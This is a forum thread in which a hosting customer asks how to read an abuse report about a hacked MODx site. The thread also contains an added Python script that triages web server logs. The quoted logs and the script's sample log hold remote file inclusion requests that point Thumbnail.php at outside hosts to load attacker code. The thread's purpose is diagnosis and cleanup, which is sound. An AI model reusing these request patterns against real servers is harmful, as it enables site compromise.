Abuse of website?

nzkiwi

Perch
Background:

I have a client running MODx CMS which was hacked on Nov-3. After the attack I deleted the entire contents of the site and on 7-Nov installed version 0.9.2.2 of MODx. I have also set register_globals off by adding "php_flag register_globals off" to .htaccess.

Either setting register_globals to off or installing version 0.9.2.2 of MODx is supposed to fix the security flaw. So imagine my surprise when yesterday I received this from the Abuse Dept:
Dear Customer,

Your scripts hosted at [domain.name.hidden] are highly vulnerable and allowed hackers to upload their malicious content and execute it.
Kindly correct/update your scripts as soon as possible. The webserver logs are attached herewith.
The script responsible for the issue (Thumbnail.php) has been disabled for now. Please don't enable it again unless you are sure the issue has been corrected.
The attached log included entries like:
82.75.139.224 - - [10/Nov/2006:11:30:07 -0500] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.dkarns.com/tCustom/install? HTTP/1.1" 200 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
201.27.109.141 - - [10/Nov/2006:12:14:45 -0500] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.psychicchronicles.co.uk/forum/chat//inc/cmses/sh.txt? HTTP/1.1" 200 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.96.134.106 - - [10/Nov/2006:14:40:27 -0500] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://free-ftp.org/suceveanul/sep3.txt? HTTP/1.1" 200 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
83.137.17.37 - - [10/Nov/2006:16:19:26 -0500] "GET //manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.cyclechem.com/list.txt?? HTTP/1.1" 200 978 "-" "libwww-perl/5.79"
83.137.17.37 - - [10/Nov/2006:16:19:30 -0500] "GET /2004_shows.htm/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.cyclechem.com/list.txt?? HTTP/1.1" 200 11736 "-" "libwww-perl/5.79"
My question is: How can I verify whether the information shown in the log represents successful abuse, or whether the entries show both unsuccessful and successful attempts, and how can we identify which is which?

I opened a ticket seeking the above info over 12 hours ago, but as seems to be my fate, I have heard back absolutely nothing.
ID: EUY-16410-798
Status: new
Priority: unassigned
Opened: Sat Nov 18 2006 09:54AM
Last Msg: Sat Nov 18 2006 09:46AM
Due: Sat Nov 18 2006 10:54AM
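One way to start answering the question above from the web server log alone, as an added example (not from the original post, the host, or the MODx project): parse Apache combined-format lines, pull out requests whose query parameter value is itself a URL (the remote-include pattern visible in the attached log, base_path=http://...), and compare each hit's status and response size against the script's most common reply. In the attached log most hits answered 200 with exactly 298 bytes, which looks like the script's fixed error or empty output; the two hits with other sizes are the ones worth a closer look. The log lines below are constructed to mirror the shape of the attached entries, with placeholder addresses and an attacker.example.net host; the heuristic is an assumption about how this kind of script behaves, not a rule from the page.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Apache "combined" log format: ip ident user [ts] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"\s*$'
)
# A query-string value that is itself a URL is the signature of a
# remote file inclusion attempt (here: base_path=http://...).
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log, shaped like the entries in the abuse report.
# Addresses are RFC 5737 documentation ranges; the host is a placeholder.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Nov/2006:11:30:07 -0500] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://attacker.example.net/install? HTTP/1.1" 200 298 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Nov/2006:12:14:45 -0500] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://attacker.example.net/sh.txt? HTTP/1.1" 200 298 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Nov/2006:14:40:27 -0500] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://attacker.example.net/sep3.txt? HTTP/1.1" 200 298 "-" "Mozilla/4.0"
198.51.100.8 - - [10/Nov/2006:16:19:26 -0500] "GET //manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://attacker.example.net/list.txt?? HTTP/1.1" 200 978 "-" "libwww-perl/5.79"
198.51.100.8 - - [10/Nov/2006:16:19:30 -0500] "GET /2004_shows.htm/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://attacker.example.net/list.txt?? HTTP/1.1" 200 11736 "-" "libwww-perl/5.79"
203.0.113.5 - - [10/Nov/2006:16:20:00 -0500] "GET /index.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['size'] = 0 if rec['size'] == '-' else int(rec['size'])
    return rec


def remote_include_params(path):
    """Return [(param, value)] for query parameters whose value is a remote URL."""
    _, _, query = path.partition('?')
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(v)]


def triage(lines):
    """Keep only remote-include requests and mark each one as 'baseline'
    (same status and size as the script's usual reply) or 'REVIEW'."""
    hits = []
    for line in lines:
        rec = parse_line(line.rstrip('\n'))
        if rec is None:
            continue
        remote = remote_include_params(rec['path'])
        if not remote:
            continue
        script = rec['path'].partition('?')[0].rsplit('/', 1)[-1]
        hits.append({**rec, 'script': script, 'remote': remote})

    # The most frequent (status, size) per script is taken as its routine
    # answer to these requests, e.g. a fixed-size error page. A 200 on its
    # own proves nothing: the script ran, but that is its normal status.
    counts = Counter((h['script'], h['status'], h['size']) for h in hits)
    baseline = {}
    for (script, status, size), _ in counts.most_common():
        baseline.setdefault(script, (status, size))
    for h in hits:
        same = (h['status'], h['size']) == baseline[h['script']]
        h['verdict'] = 'baseline' if same else 'REVIEW'
    return hits


if __name__ == '__main__':
    for h in triage(SAMPLE_LOG.splitlines()):
        print(f"{h['verdict']:8} {h['ip']:14} {h['status']} {h['size']:6} "
              f"{h['script']} {h['remote'][0][1]}")
```

The verdict column is a triage aid, not proof: an identical small response across many hits says the script most likely returned the same error or empty output each time, while a different size means the script did something else for that request and the server should be checked for files dropped around that timestamp. A 'baseline' hit can still have succeeded if the included code produces no output, so the log check complements, rather than replaces, a filesystem review of the site.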
 
nz, actually this type would require the sender to reply to you or Tanmaya/Deepak to look at logs and tell you, so it may take a bit longer.
 
nz, actually this type would require the sender to reply to you or Tanmaya/Deepak to look at logs and tell you, so it may take a bit longer.
As usual, if I post to the forums, a response to a ticket occurs within a very short time!

I don't mind if it takes 24 or 48 hours to get an answer to my question. However, not receiving a response for such a long time is what irritates me. The ticket now has a response:
Hello,

We are looking into it and will update you soon.


Thanks and Regards
Akshay
That's all I wanted. If that had been added to the ticket hours ago I would not be posting here. Please Jodohost, keep your customers informed.
 
Well, it appears to me that all the hack attempts since 7-Nov have been unsuccessful and I have provided Jodo with the evidence to support the claim. Just waiting for Support or Abuse to re-enable the script :))
 
For clarification to this post, there was a hacked file left in a hidden location inside the client's folders causing more uploads of malicious content.
 
Yes, we managed to "restore" a hacked script! X(

Thanks to Tanmaya and his team, it has all been sorted out :))
(however Thumbnail.php was not the culprit)

Now if JH could improve on the ticket system so it didn't show "unassigned" when someone was actually working on it, I would be ecstatic :D
 
Now if JH could improve on the ticket system so it didn't show "unassigned" when someone was actually working on it, I would be ecstatic :D
Give us some time on this. A lot has been going on recently. As soon as we get to Cerberus 3.2, we will certainly consider it.
At present if it is assigned to someone, others can't see it at all.
 